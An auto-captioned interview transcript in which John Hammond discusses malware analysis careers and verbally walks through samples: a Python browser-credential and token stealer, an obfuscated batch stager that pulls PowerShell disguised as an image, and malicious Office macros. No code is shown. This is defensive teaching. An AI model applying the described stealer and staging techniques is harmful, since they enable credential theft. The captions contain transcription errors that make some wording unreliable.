MALWARE ANALYSIS // How to get started with John Hammond

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what phone numbers can it track down what email addresses or ip addresses credit card information bitcoin addresses street address it's trying to get everything yeah very scary right uh but and this might look like a lot of code i know regular expressions can be kind of hard to read but i want to at least surface surface this idea to you they might do some pretty sketchy stuff [Music] hey everyone it's david bumble back with john john's going to show us some really interesting stuff today i don't want to spoil it john so you take it away hey there david thanks again for letting me come be here with you i'm super excited about this one that's great to have you here so what are you going to show us well hey uh in the last couple of videos i think we were chatting about capture the flag yep which is an awesome vehicle and vessel to learn and get started uh within cyber security maybe kickstart your career if you're interested in that but i think some folks divide in their mind what you can do with this whether it's just strictly uh okay red team pen testing adversarial emulation threat emulation or blue team defense and strictly that maybe manning a sock or a security operation center so there's so much out there uh one thing that i tend to do for my day job personally is kind of working as a malware analyst so understanding how the hackers and how the bad guys and the attackers get onto your computer get on the target system and how do they stay there how do they remain undetected what are their persistent footholds or the implants or the back door that they use to continue their operations so i think we can maybe have a cool conversation about some uh some malware analysis and some stuff i'd like to showcase there yeah i mean i mean you were telling me previously you i mean you're well known in the industry for ctfs i mean you do a great job going through ctfs but i mean in your day job you actually do malware analysis is that right it is yes so let's see let's explain from sorry i didn't want to interrupt from the very beginning what is that actually yeah so there are a lot of honestly different ways you could go about it um some folks and and maybe i'll get some maybe i'll get some flack for this some folks are strictly in a compiled computer program or the binary itself so they'll open it up in tools like ghidra or ida pro or other debuggers and disassemblers and they'll kind of comb through the weeds really looking at the assembly instructions or the computer op codes that make that program do what it does and that's tough i'm not going to lie like that that's hardcore work kind of looking through assembly op codes and understanding how that machine language is kind of worked through truthfully and i'll be honest i don't do that as much i'm not too sharp in that world and i certainly need to get smarter but the way i see most often how hackers kind of maintain their persistence and they slide under the radar because they have to combat against like anti-virus programs and edr all the other defensive mechanisms we put in place so they have to get crafty and pretty clever so they might use obfuscation hiding their code or they might use live off the land techniques even if it's just using a simple scripting language where the code is readable by us humans but it's mangled and transformed and presented in a different way that can be really hard to understand so having the human context like us as security folks actually taking a look at it that's what's super important because we might see what the computer the automated solution might miss that's interesting so i mean it's um there's all this talk about ai and stuff but it's you're saying that there's still a very important role that humans take in this stuff i would say so i haven't drank the kool-aid on artificial intelligence and machine learning just yet don't get me wrong there is absolutely a need for that there's certainly it's imperative to have automation and some of that tooling in your security stack but having that like parachute having having that last escape like planned here uh don't forget to let a real security person kind of look through it with their own eyeballs they'll have the context and understanding then maybe they'll find something else and that's how you get threat intelligence that's how you determine indicators of compromise that's how you understand what's shaking up the security landscape so tell me i mean this is a question i'm sure a lot of people are going to be thinking about how do i get to where you are so do you have like i sorry i always ask this question so is there like a path that you would recommend or a like what do i what do i need to study are they certs are they ctfs how do i get to where you are if i want to you know do malware analysis for sure i i always go back to it but man i i really think those capture the flag challenges they'll give you the exposure they'll get you so familiar with other languages and the technology you might see maybe more specifically uh windows right uh and maybe you'll have more exposure to that in a network administrator role or a sysadmin role a system administrator role because you're going to get used to being in the command line or scripting with powershell or batch and we see a lot of powershell like a lot a lot of powershell those are certainly important and i i'm not positive maybe you you might tell me a little bit more david some other microsoft or some other certifications that will really help fill those gaps but you just get smart on this by playing with it by experimenting when i try to showcase malware analysis videos on my channel it's different from a capture of the flag because in a ctf there's an objective goal but for this sort of work in malware analysis it's very exploratory we're just kind of bumping around in the dark and trying to shine the light on as much as we can so i mean in your in your day-to-day job what do you it sounds like most um malware is on windows systems and that's perhaps because windows is so dominant in the enterprise is that kind of right is that you see mainly windows stuff it is truthfully uh so i have to say with a little asterisk and disclaimer here uh for for what i do for my day job we focus solely right now on windows machines okay windows targets and windows victims uh we're in the works for rolling out a mac agent but uh hey i don't mean to turn this into a commercial there is absolutely more malware and virus and rats and trojans on windows as you mentioned because it dominates the market space it's all over the industry but that's not to say there aren't any on linux or mac but it's just a different form a different variation and uh not as prolific as all the folks running windows yeah but it's interesting i mean it's it's funny when i talk to you and i talk to other people it comes it always comes back to the same conversation do ctfs go to you know hack the box or try hack me or something and spend time doing a whole bunch of cdfs and i mean i just want to i want to plug you because it's important if you want to see someone who knows what they're talking about doing ctfs go to john's channel because he's got lots and lots of videos you must have like 100 videos or more just showing ctfs is that right yes i i i think i have like over a thousand on my channel but maybe not strictly capture the flag uh i am very flattered and i super appreciate all the kind words i do have to say hey there are tons of people much smarter than me i wouldn't be able to compete in like a defcon ctf or do that low-level binary exploitation there are some real geniuses way way more ahead of me but i want to i want to make it approachable i want to make it friendly and i want to make it something that anyone can explore and play with and learn from and i mean that's important especially when you're starting out because i mean when you're starting out you're not quite sure so pico ctf we mentioned previously i've got a previous video on my channel where john talked about that john i hope i can twist you on some time to do you know hack the box or try hack me examples but otherwise just have a look at john's channel he's got a huge amount of content there so john that's great what about a practical demonstration is there a example like perhaps solar winds or something that you can show us we mentioned that absolutely yeah so i have a ton that i can showcase um i think what would be cool to do is like if i can kind of get your feet wet if i can get your ability to know what some and then maybe in a second video or however you'd like to organize it we can dive into a little bit of solar winds that'd be great yeah let's show us let's because otherwise i'm going to jump too far give us a baby step so like i assume that i and some a lot of people watching have zero knowledge of this so take us down the path for sure uh i will go ahead and share my screen okay so here i am doing a little screen sharing just to showcase kind of what we can get into for a little practical demonstration uh and i and i want to set the stage here so i am running windows 10 on my host computer um i use linux i'm using ubuntu in my virtual machine you'll notice it has a little cali background but that's that's just for the click bait i am running ubuntu here uh and i have this this virtual machine set up with a little communication for my host machine or some other network sheer so uh because i use so many laptops because i use this as my desktop computer i'll set up a network share for some of the files that are kind of important to me to access now you'll notice one of the fun ones in here is a malware folder i i keep track of my notes from things that i'm learning i keep track of capture the flags that i play or other certifications that i'm studying we talked a lot about it before yeah hey build out your catalog build out your library and it's funny now i've now i've been collecting and building up a repertoire of even malware to look at whether it's for content whether it's for stuff to showcase on youtube or it's it's just for learning and exploring what techniques and tradecraft some threat actors might be using so we'll dive into this folder and i want to show you some of these cool ones just to again get your feet wet i try to organize them by maybe the language that i know the thing is going to be written in or uncategorized so we'll have a few samples and this is a growing list in some of those other designated folders but the miscellaneous one is getting larger and larger as more people send things to me as i see more things kind of going through what i do and it's very it's cool it's weird it's like a little garden that we that we water and flower to to get exposure to new things that's great yeah definitely looking forward to that solar winds one and um we'll do that in a like you say after we've we've got our feet wet yeah so i i think i'll start by showcasing some python one just because i know we uh discussed a little bit of pike of python in the previous pico ctf video yeah so i'll show you one script that is originally written very human readable because the malware author the bad guy whatever person who put this together had to write it they had to write the code and being python you'll know hey this isn't strictly on uh already installed on windows computers or the target but it can certainly be compiled or compressed down and you'll see a lot of other variations whether it is in batch or visual basic script or powershell or c-sharp or a compiled binary etc so let me take a look at this code uh and let's actually open it in my virtual machine so i'm not you know testing the water [Laughter] you don't want to run that yeah okay i realize that's a little bit wonky but uh i'm gonna take a look at this main working no obfuscation script and just to get an idea as to what this looks like now this might be spooky this might be kind of scary for folks taking a look at it but if you're familiar with the python language this should be readable python is meant to be very easy to read and easy to write but you'll see functions defined in here to get credentials and it might look in your local application data folder that's kind of configured on windows computers it'll keep track of the locations for google chrome or opera browser or the edge browser brave browser etc and it might try and track down if it can find a local database of cached information like your passwords or what your usernames might be this is something similar to kind of what we showcased in or what i've showcased in a discord token stealer or a slack tokens dealer or they might try to find your access controller for your account and that that will bypass two-factor authentication or multi-factor authentication all on its own if they could get their hands on your user's token and that's stored of course if you save it and cache it on your computer so they might use regular expressions to track that down and they'll keep track of all this there are tons and tons of this this this malware builds out hey trying to find download history and i'll i'll cruise through here or browser history pii put together in regular expressions what phone numbers can it track down what email addresses are ip addresses credit card information bitcoin addresses street address he's trying to get everything yeah very scary right uh but and this might look like a lot of code i know regular expressions can be kind of hard to read but i want to at least surface surface this idea to you they might do some pretty sketchy stuff and this code goes on and on uh over on the right hand side you can see like the the map of what sublime text might be looking in here and it will track down your ip address it'll try to see if you have a webcam attached can it take a screenshot will it look for your computer info what cpu are you using maybe that could be used for deploying a cryptocurrency miner like lemon duck or lots of other variants etc etc okay it's grabbing a bunch of stuff and then i'm assuming it's going to do something with that is that wrong yeah i think this one specifically is is just for exfiltration uh it is going to try and grab those discord tokens it is going to try and grab those other information and uh like accounts and passwords keep in mind even doing this if it's not going to okay explicitly detonate and deploy ransomware or turn a computer into a member of a botnet or to face a website even getting this information that still means money for the bad guys because they could sell this out in the kind of the corners and crevices of the internet right the dark web quote-unquote yeah you see i see at the bottom it looks like you've commented it out like it looks like it's going to a non-files.com website or something yeah going and trying to upload things so that it's all accessible for the bad guys maybe uh maybe keeping track of these yeah so it looks i mean i mean i haven't looked at the code very well but i mean looks like it's trying to grab a bunch of stuff and then if you ran this it would push it to a website or something yeah yes now i i bring this up and i show this to you because some of you might say like well john this is just totally in the clear like this is very obvious what's it's what it's doing you can just read it in the source code and you're absolutely right uh yeah because i mean if you try and run i've had a lot of people complain about this i wrote like a simple um python key logger and as soon as you run that uh windows just deletes the file because it sees it as malware yeah right right yeah anti-virus uh and uh that's always a formidable foe windows defender is certainly getting pretty smart yeah so i mean are you are you gonna show us now how you how the bad guys for lack of a better word would take something like this and then try and hide that yeah yes so uh there was one other folder or one other file kind of in this folder that i wanted to showcase they have an obfuscated rendition where if we take a look at this it is completely intelligible like there's no understanding of what the heck is going on this is a very extreme example like this would certainly take me a hard time to understand what's happening they've replaced every variable every function name every string with underscores or some weird mathematical way to kind of compute it and look at look at that sidebar there's no way to make sense of what this is doing again super extreme example but i want to show you that that idea of obfuscation that just means making code that means making the badness transformed or encoded or encrypted in a different way so that the computer and the human being might have a hard time understanding what the heck this thing's doing so in your experience do you find that um most of it looks like this kind of craziness or does it is it clear text or is it just a mismatch of all kinds of things so it is super uh variable oftentimes uh if a hacker is on a computer system if a threat actor is kind of working their way in they never want to touch disk or have remnants on the file system because then they leave themselves vulnerable or kind of they leave themselves subject to that anti-virus software stepping in or that edr automated solution when they touch disk then they have a footprint then they have an artifact and they've left their fingerprints there yeah so oftentimes the what they do end up dropping on the file system if they do is a very obfuscated little stub or kind of a stage one payload that might extract or pull out or maybe download a secondary stub or another payload and maybe that'll be obfuscated or encoded in some way and it'll work through layers and layers of different stages maybe going up to three or four or five or six different bundled layers of the onion to really find the final payload and that final payload might be obfuscated or it might be in the clear kind of just as we saw a moment ago i'll show you a few other examples of this if that's totally cool of course the question is john how on earth do you find this stuff yeah so how do folks and i have a lot of questions like hey how can i find samples like this truthfully um if you want to look around there are a lot of online resources vx underground is well known uh the zoo is a github repository that is again well known uh malware bazaar i think it's like uh abuse.ch or something i could track down a link and send it along yeah that'd be great the malware bazaar is actually excellent because they'll let you download samples and they'll let you tinker and explore and you'll find tons of online sites like i don't know i'm not sure if joe's sandbox or any run will let you download a sample off the top of my head virustotal sorry go on virustotal um if you know the hash of something and if you pay for the paid tier which costs an arm and a leg but some organizations and companies might be able to latch onto that they'll let you download as well and that that's what's studying yeah sorry go on i keep no i realize i'm long-winded no no i like it you might also just get a weird random text message or you might get a totally arbitrary email that's just an advertisement that links to some weird sketchy site those are always fun to dive into as well i i've started this little game whenever my friends in the real world to get one of those weird spam text messages or emails they just send it along to me because like hey that that'll be fun to look through so i mean that's interesting i mean so for studies i'm glad you mentioned that so for study purposes there's a bunch of websites which will are linked below where people can go to uh but be warned i suppose we have to say be warned this is like stuff that you don't want to mess around with um so be careful um but how do you find the stuff in the real world is it like the antivirus picks it up or do you does a company phone you or do you have like software on on companies like your i mean feel free to talk about your the company you work for so um is it like software that that's installed that picks us up and warns you that there's something weird or i mean how did you get to that file yes so uh the example that i showcased just now was a community submitted one with some viewer and audience member sent along um the way that this sort of got started and this kind of gained momentum on my youtube channel was me wanting to tie it closer to what i do for my day job for my real work now i i work at a company called huntress and huntress is a managed threat detection company with with software as a service or an agent that you install and deploy on your machine and it is that you can deploy it across as many machines as you want to get the most visibility in coverage it and it is that backup parachute it's going to look and hunt in those known directories or locations on a computer's file system where hackers will leave their back door or that implant they get their hooks and claws synced in there those are oftentimes simple startup programs like the same way hey your computer maybe might turn on in the morning and skype will automatically open so you can work with your co-workers or slack or teams or whatever you tend to use to communicate that has to know how to do that so there's a location in windows and maybe even in the registry or some wmi event consumers or services scheduled tasks anything that can automatically without user interaction pop up that's where the hackers are going to hide so even the microsoft utility from from sysinternals that auto runs tool will show you all of these our agents is auto runs and mass like deployed across an entire enterprise so that's how we hunt and and do this threat analysis so i mean that that agent like will alert you it looks like there's some dodgy code on the computer and then you you'll you'll investigate that is is that hard the sort of the i'm just trying to work out the logic in the real world how do you how do you assume some one of the samples you got was a real world sample how do you actually end up getting to look at that code yes uh it it does require truthfully your own intervention it does require your own effort and initiative to like let me go let me go look like let me go make sure there's no weird code like a randomly named file with a dot visual basic script or a dot bat or powershell extension uh just to look just to see so your software will alert you to that or do you spend like time going around looking at computers or just a combination of both yeah combination of both real really it is it is a synthesis and again i don't i don't mean to make to make this an advertisement for my children it doesn't matter i mean this is about real world so i mean let's use your company as a real world example so i mean feel free to talk about it talk about what you do because at the end of the day everyone watching this wants to become like you as in like perhaps they want to get a job in a company like that so i mean this is going to be a long series john i think because the next question i'm going to ask you is how do i get a job so like um start with ctfs that kind of thing and i'm jumping around now so so go for it explain what you do and then we can come to jobs and then look at more code sure thing so the i i mentioned it is a synthesis and i mentioned earlier that automation is absolutely necessary it is still imperative but it's not the end-all be-all so yes we we do get alerted kind of automatically we have some triggers and flags set up for for finding and seeing badness like this uh we'll write detectors or something like hey if it if the persistence mechanism if the file name if the command line arguments if they match this sort of of pattern or this sort of tradecraft the certain schema that a hacker might use and what they deploy and maybe mass spam across the internet we'll use detectors to detect those faster then of course we do hunt where we're actively looking we're just spot checking as many machines as we can and we kind of have it set up a little cue like here is a humongous pile or a bucket of auto runs of persistence mechanisms of new code or new files or new samples that we've never seen before and they might be benign they might be totally innocent or they might hey maybe be some cause for concern so it just takes the human action it just takes you taking a look at it like literally looking with your eyes and just not blindly trusting the dashboard or the seam solution to uh trigger on it because we whine and complain about false positives yeah but the false negatives are much more dangerous when there's evil and badness there and you're totally unaware you're blind to it yes i mean on a day to day you would you would i think we must do a day in the life of john hammond that'd be a good one it'd be very boring no no i don't think so um so like during the day you you would you would get alerts um obviously there's like i'm assuming there's some kind of like team that's um checking all the alerts coming in um but you'll also go and like look for weird stuff perhaps on the internet or on your customers computers to try and see if you can find something is that correct absolutely um we do take so input and intel from other sources right so when i talked about those anti-virus products like windows defender or xyz name your name your av tool of choice uh that will still tip you off uh so when you you can let preventive security still kind of help augment and help supply for your detection your detective security they all kind of go hand in hand but uh i think it is still vital and absolutely necessary that you on your own you keep track of the threat intelligence you keep track of the indicators of compromise and go hunt and go look so john before i get this thought out of my head can you tell me like okay i'm interested in becoming like you i want a job like yours is there um you've mentioned ctf stuff like that um what kind of skills like let's say you were looking to employ a new person that was doing like kind of what you're doing um what kind of things are you looking for so what should that person do to put on their resume as an example to to be more likely to get a job doing what you're doing yeah so there are there are elements that i'll say that that make me sound like a broken record because no no that's fine that's important and uh and there might be some new other other elements to pour in here in the case of malware analysis in the case of incident response in the case of fred intelligence um yes you still should study and you should put it out and you should document it and give it to the world have the website have the blog have the github have the articles videos and youtube etc uh be present be in the community talk etc go to conferences more and more and more everything i've said prior but for malware analysis it's not strictly playing ctfs and try hack me and hack the box yes you need those and they'll supplement and again it's an iterative process if you need to bounce back to them so you would put that on your resume yeah i would personally if it's something that you're proud of if you're like hey man i'm in the top 100 for my country or something or i'm the top 10 in the world like a suite hey yes sing those prizes from our analysis maybe you want a little bit more maybe you want to go look at those samples like on vx underground like on the malware bazaar now i have to caution this uh with the point that you mentioned earlier you need to be careful yeah like uh i i i live on the edge maybe i i'll i'll try and curl down i'll go see if i can access that weird endpoint or url that the payload reaches out to maybe i'll send some traffic that way just to say hey what'll it do i'll poke it with a stick but make sure that you kind of know what you're doing uh have the proxy have the vpn have the virtual machine have defenses in place some extensions that make sure you're not falling down a road you shouldn't make sure your antivirus and host isolation stuff is on but build out that library build out that catalog of samples that you've looked through and stuff that you can showcase and hey you've written about you've produced so i would encourage that to folks that are are wanting to get a little bit more of a job or career in this yes explore and play with it on your free time and uh start applying like there's no shame in that i'm gonna push you because that's what i like to do with everyone if i interview so okay that's great so let's say i i i want to get a job now i go into linkedin i search for what what do i search for and then what are employees employers are going to be looking for um like i mean you've mentioned like put ctfs there i could say that i've i've worked with a whole bunch of malware but are there any like trigger words like certs or you know how do i get which jobs do i look for do i just say in malware analysis sorry this is kind of like a long-winded question but i'm trying to i'm trying to help someone like if i wanted to practically go and do this tomorrow how would i do that like how what do i search for what are employers looking for so linkedin indeed glassdoor whatever any of those sites are a an option if you are looking for malware analysis you might find that you will look and you'll see a lot that are specifically those compiled binaries which are is true much more genuine reverse engineering um and a lot of those truthfully are going to be a little bit more government or military or defense contractor stuff i'll be honest because hey that's in high demand there they kind of want to get ahead in that in that cyber warfare game and that's very important and understanding threats in the security landscape is all part of that so maybe you might you might have some luck hey trying for a security clearance or having a little bit of military background in you that's an option that's one road to go down um but those key words those hot topics uh malware analysis reverse engineering uh obfuscation payload exploit blah blah blah try hackman hack the box are still in the mix without a doubt but certifications i think sans offers one of the grem or gayac reverse engineering malware a lot of this is very forensics oriented too dfir digital forensics and incident response that's all part of the puzzle yeah i mean i'm not i'm if there's no like clear path that's great it's just to try and help someone like i come from a networking background and it's quite obvious you know there's certain stepping stones that you would go through and if you were looking for a certain type of job you'd look for a certain certification like um if i was looking for a job i would what i searched for like oscp or is it just some of the terms that you've used like as an example john how did you get your job was it just because she put your name out there and then someone saw it and or did you have to go searching yeah i i hate that i'm never i i don't have a great example uh because my case is is very strange very odd i'm a lucky unicorn uh a lot of it is having the notoriety the self notoriety um my that that comes from youtube that comes from that comes from youtube yeah but there you go so i mean it's like put your name out there yeah my boss reached out and was like hey john you look like you're doing really cool stuff you want to come party with us uh and i'm like yeah that'd be a ton of fun but it's funny you know it's um i i've interviewed other people and they've kind of said the same thing it's and i'm a firm believer in that when i started putting my name out on social media doors opened i used to try and hide it i mean you're in the security world i mean it's like you know if you can put your name up there then i don't think others need to worry about putting their names up there um so like you was it through youtube that you got found is that right uh honestly this is really weird it's it's a story for for my current job um but others i can explain it if they might i mean you're more than welcome to sh okay john off camera if you don't want to talk about that that's fine but i mean i'm gonna i'm gonna ask you to share your story if you if yeah if you're okay with it so i'll go through a couple different phases here um when i was getting out of college when i was getting out of my schooling and undergraduate i was looking for my first job i was looking for my first thing to get my foot in the door to see hey where am i going to land in the market and it was an interview and a job that i was applying for for an instructor role for teaching and for uh getting interaction with students and going up and doing doing the song and dance talking to powerpoint uh so i came into the interview with a book like a binder of look hey here's the textbook that i wrote when i taught a course at my school because they kind of trusted me with that leadership and explaining and showcasing technical concepts in linux everything that youtube and everything that being an a present community member has trained me for that's where you can find my value uh and i can just show that to them so they're like hey i know you're some green kid like fresh out of college but we totally trust you with this instructor role uh because you've you've proven that you've shown that uh and and that was really what i go back to when people ask me like how how how do i get an employer to take a chance on me well hey show them like everything that you've done and then they'll they'll really value that so that's that's that's github that's youtube that's your articles and your blog that's the way it's it's really interesting that you say this because i mean it's um the world's changed dramatically hasn't it so in other words what you've what you're telling me and i'm kind of pushing you on this is you telling me don't worry as much about certifications per se spend time getting your name in the community like go on linkedin make connections um create blog articles uh whatever create videos do something but get known in the community because it's who you know that's more important than perhaps always what you know even though that is really important is that kind of like i don't want to put words in your mouth but like kind of is that kind of correct in what i'm saying yes i think it totally is and i and i think i can i can piggyback off that for the conversation of my next one at the job that i'm at currently this is funny and i think it ties in well to everything that we're talking about um i knew the ceo i knew my boss two or three years ago before i got started with the company because i i saw him on the internet i saw him across the twitterverse uh and and i s and i noticed like hey this guy has a lot of followers like this guy's known in the community this guy he seems like a cool guy so i literally reached out and like cold called him and i was like hey oh wow i i i'm doing some like some youtube stuff i try to produce content on on videos and cyber security and ctfs would would you mind just like sharing my stuff would you mind retweeting it or something and it was so weird so you literally phoned him yeah yeah uh it was a twitter message it was genuinely a tweet well i'd probably go back and find it uh but he's like hey john like this stuff is really cool you're doing some awesome work uh and then we have strangely known each other across the internet airwaves for two or three years and and actually we we ended up meeting uh he showed me the office at the time because it was a startup kind of getting in motion uh about over and over in maryland in the united states and we had lunch together it was cool it was just like hey bro is hanging out uh two years three years later he texts me hey man uh we just got some funding uh we're doing some pretty kick-ass stuff i think you are too you want to come be on this party uh and that's the rest is history right i love that role i'm very fulfilled with what i'm doing now but it it all comes from being in the community and reaching out and sharing content and knowledge yeah i mean i think i think that's really important to emphasize and i i i'm a firm believer in that as well um you know if i if i wanted to hire someone and i mean you tell me if you agree let's say you have to hire someone tomorrow would you hire someone who's just got a bunch of certs or would you hire someone who you know um who's who you see doing stuff out there and i think for me personally you you know you want someone with a certain character character is really important um you know you don't want to just hire based on certs um and if you see what they're doing and they're putting out content far more likely that you're going to pick that person yeah i think we've had a conversation just like this in kind of our last session but uh i i would certainly opt for that individual that is that is prolific in in sharing what they're learning and demonstrating that hey they're they're in the grind too they're wanting to soak up more and more information um yes certifications are one piece but uh we we've also had the conversation hey some certifications can be a just a brain dump test it could be rote memorization you chew it up spit it out and that's it uh if if they're in the mix if they're in the scene if they're known in the community and they're they're producing stuff i really like to see that it shows drive and determination and it also can show me what they know and what they can demonstrate and what their merit and competency really is that's what i'd go for personally that's fantastic okay john come show us something else that's interesting let's see have you got another good example sure thing i can uh try and and what our appetite again here so i'm back in that uh shared network share uh from my malware folder i have these kind of used and unused folders where i differentiate what i've already looked through or what i've produced a video on etc uh so i'll get back into our unused pile and i've showcased that there are a lot of different languages that this might come in by no means this is this is all encompassing like sure we've got c sharp in there also compiled stuff c plus there's java there's it it goes on and on and on i showcased just a tiny python example to kind of get the idea across for obfuscation but i want to present that in a different way now let's move into that batch directory and take a look at one that is obfuscated uh i guess this file's name spooky so i will open this up in a text editor and i don't know if folks are familiar with the windows batch script but that's that command prompt that's that spare that's that's that big black box right where you can type in commands and have more finer control over what your computer is doing but you can script that you can automate some of those commands that it might be running so again maybe you look at this and hey this makes complete sense you're right or it doesn't uh and this is where those bad guys are going to use clever tricks where they're going to have something up their sleeve where they understand how the language how the computer like the scripting language itself will be interpreted and read sure it'll it'll clear the screen that one's known to us it'll turn off the display of commands use some delayed variable expansion extension and it will set a lot of variables set is kind of the syntax and keyword to define a variable and batch here but you'll notice that this variable is set to nothing so they might just use this whole random weird string to i don't know get in the way of other things they'll loop through some stuff with randomness in the mix dividing things and then they'll start to define different chunks of some weird variable name being simply set to letters of the alphabet so later on in the code they can go ahead and put this together and build out a payload one character at a time with randomness all throughout it so the final payload might make com no sense it might be completely intelligible but you might be able to see fragments of oh a program data or a path in here and oh i see some extensions of dump files or exe and zip files that might be kind of referred to eventually and then we start to break up looks like a url http https going to some weird amazon s3 bucket where they're reaching for an image file kind of strange but then they'll invoke powershell where they'll hide the let window turn on word wrap here and we have this chunk of inline powershell code and we might need to start to figure out okay how does that do what it does i will go ahead and put this into a powershell thing so some videos that you might see on my channel are either me trying to understand what code might be doing through a like beautifier some online tool or some utility that might be able to display this code in a little bit more readable sense or i might go through it manually to try and understand what's happening where and just make this more readable and understandable for me some of these variable names that are being pulled in came from that script previously and if we end up downloading something like that strange png file what if that's not really an image file what if they pull it down and it turns out it's just going to be more powershell code that's evaluated and executed on the fly so i realize yeah there are still some weird variables in here and it's still hard to read but this is certainly much easier to look at than this in my opinion oh yeah oh definitely so again that's uh really kind of what i wanted to offer and showcase here i don't need to go through a ton of this for this video if you're interested in that check out some of the stuff on my channel but these techniques of hiding things within variables sometimes threat actors have even hidden the set command itself that i think was a well-known trick in uh trickbot right one of the one of the other larger malware families between trickbot and emote trickbot has certainly done some other clever stuff with the language here in batch to hide that stager or that initial payload how many languages do you know i mean i remember you said python was like your core one is that right yeah i again i wouldn't say that i'm fluent in in much anything other than than python um but you can you can interpret what you're seeing there yeah absolutely yeah uh you'll get familiar you'll pick up the syntax at the end of the day a lot of it is uh the same concepts right the programming concepts of logic variables functions and flow those are those are really what you'll get exposed to but john tell me is it by osmosis that you learn this stuff or is it just like but through ctfs you kind of like you just get a feel for you know what's good what's bad code how do you is it like bad code is like weirdness whereas normal code wouldn't look like that so i mean if i was looking at something on a computer how on earth would i know if it's good or bad you're totally right uh that is a hard call to make um because some languages like okay maybe javascript is a fine example they'll minify or compress and pack the code just so it's smaller just so it can run faster and be optimized and efficient so maybe the randomness that you see isn't a definitive like litmus test for what's good or bad if you find some telltales of known dangerous functions like eval or execute or i don't know invoke expression assembly load ad type etc those those will have some other side effects of just executing code on the fly that can be bad i might be able to pivot to another more real world and tangible uh example of that if that's okay to discuss that uh sweet okay uh i wanted to showcase maybe something a little bit more real world or maybe something a little bit more tangible to some folks because we talk all the time about like office macros or you get an email attachment oh it's a weird word document or it's a weird excel file so i i'll showcase this one that was sent along it is an xlsm file or an excel file and there's another one.doc so you could open this up in microsoft word or microsoft excel and you'll get those pop-ups like hey content has been temporarily disabled uh for security do you want to enable customers yes yes yes yes yes a thousand percent well the moment you do that the moment you click on yeah totally let's run this thing let these security macros go there are functions and hooks set up to do damaging stuff depending on what it is maybe it could be totally innocent but you'll have to look yes you can look in microsoft word in microsoft excel and office but hey you're you're kind of rolling the dice and gambling a little bit there again i'm in linux right now so i'll use a tool uh i think it's ole vba and uh that way we can kind of take a look at what is inside these files so i i mentioned this because ole vba actually does a really good job of giving you kind of a description of what it found and what's weird in here ooh we saw the run syntax and maybe that means it'll run some other program or like a command like dell c windows system32 to delete everything or maybe it'll load in a library or download files uh it's encoding stuff with hexadecimal or base64 base64 a good tie-in as we talked about in picoctf yeah and if we scroll up here if we take a look more through uh what ole vba kind of displayed for us we can see the real syntax we can see everything that's defined in these macros without opening it and and kind of living on the edge there in microsoft office so i will bring that into an editor so it's a little bit easier to read i don't know if there is a good syntax for it decent this one's really interesting um because it will pull in functionality and code from like the windows api so the the url mon dll or that library that exists on your computers has other functions that languages like visual basic script or jscript or powershell and c-sharp can hook into and latch onto so this will pull in that url download to file function and we'll start to see some weird syntax defining functions maybe pulling some data out of actual cells maybe defining that excel document or starting to prepare a download again i see this next orders function it'll take in an argument where it's trying to be stealthy it's trying to hide it breaks up that https schema and then we could explore this more and more and more we could try and make sense of these random function names but time bars and v mall a well hey again those are just things to look innocent so an automated tool might not be able to see the evil in this but this one i don't think actually has the auto open call let me showcase the other one this is the example here right when you open and click on that enable content to enable editing the auto exec document open will will just totally kickstart and evaluate and run that code well so that's a neat tool and you can pull out all of the strange code that they might be burying in that macro that's great i know it looks like a lot of noise but it's fun to uh explore and and try and make sense of yeah so let me ask you some more questions john um yeah do you think it's a great career for someone to get into um is it like is there a lot are there a lot of jobs and i'm assuming the answer is yes yes in in my opinion it's fulfilling it's a ton of fun it's really cool to see real world stuff um especially when you have those spooky scary conversations about oh microsoft exchange got hacked the sky is falling solar winds got hacked oh my goodness what is the security industry going to do hey those threat intelligence researchers those malware analysts we're the best line of defense because we can educate the community we can look for those indicators of compromise and that's in high demand right how does the world respond to like fires like this dumpster fires when something new got popped there's a chrome zero day or whatever what what is going on how can we make sense of it so uh i i absolutely think yeah this it's it's certainly a great job and there's definitely a demand for it and do you work normal working hours or is it like when something goes blows up like the solar winds thing now it's all hands on deck and you have to work like 24 7 type thing yeah uh yes the best answer is yeah uh we absolutely i mean i have normal working hours uh we work as kind of a remote gig which is lovely um pre pandemic pre-world falling apart uh it is always and will always be remote for kind of what i do but when an ambulance goes by we have to chase it whether it's nine in the morning or nine at night for microsoft exchange specifically uh yeah those were many late nights uh burning the burning the candle at both ends maybe we're up to like three or four in the morning but it's very cool to be with a team of other smart fellas and and folks that want to get into the code like this so that is is certainly something that uh is still worthwhile and a lot of fun if you're a nerd like me no i mean it's great so do you have any books i mean you you when you mentioned in another video you said you wrote a book and that's how you got your first job but are there any books that you would recommend like a malware analysis book or any like recommended books that someone can buy from amazon or whatever to you try and get into this yeah um i don't know if i could give a a one-size-fits-all answer uh as as usual do you have like five books or like a range of books yeah and again it totally depends if you want to get into like the low-level binary analysis you can find an ida pro book from no starch press um there are a ton that come out from uh o'reilly and wiley those are all great and and sometimes it's even just getting used to the the syntax um and the language constructs kind of again as i've showcased in batch and python and many others we can get into those are specific to how does this program language work and what are they reading out of that i have a ton of o'reilly pocket references where i'll try and you know get used to the hey what can i do in this language other things that are more adversarial or offense oriented there's a there's a no starch press book i think called uh off offensive go or black hat go those are great for kind of getting used to hey what can you do in some language it's very hard to reverse yeah i've got my sample in the back there in my book yeah john so if you can send us a list of like books that you think are worth looking at i mean as long as it's not a thousand books like your top 10 books or something like that that would be great for sure john as always really want to thank you man appreciate it thank you this has been a blast i hope there are some good gold nuggets out of there for for some folks if and if you're interested again in all this uh i'd happy to chat about it more oh definitely definitely gonna twist your arm to come back a lot more [Music] you
Info
Channel: David Bombal
Views: 84,394
Rating: undefined out of 5
Keywords: cyber security, john hammond, hacking, how to hack, capture the flag, hack the box, try hack me, cybersecurity, ethical hacking, cyber security career, malware, malware analysis, malware analysis tutorial for beginners, malware analysis tutorial, malware analysis tools, malware analysis lab, ethical hacking course, learn hacking, careers in cybersecurity, cyber security careers, cyber security engineer, cybersecurity jobs, cyber security jobs, cybersecurity careers
Id: sBuxwMAfGnI
Channel Id: undefined
Length: 55min 45sec (3345 seconds)
Published: Mon Aug 30 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.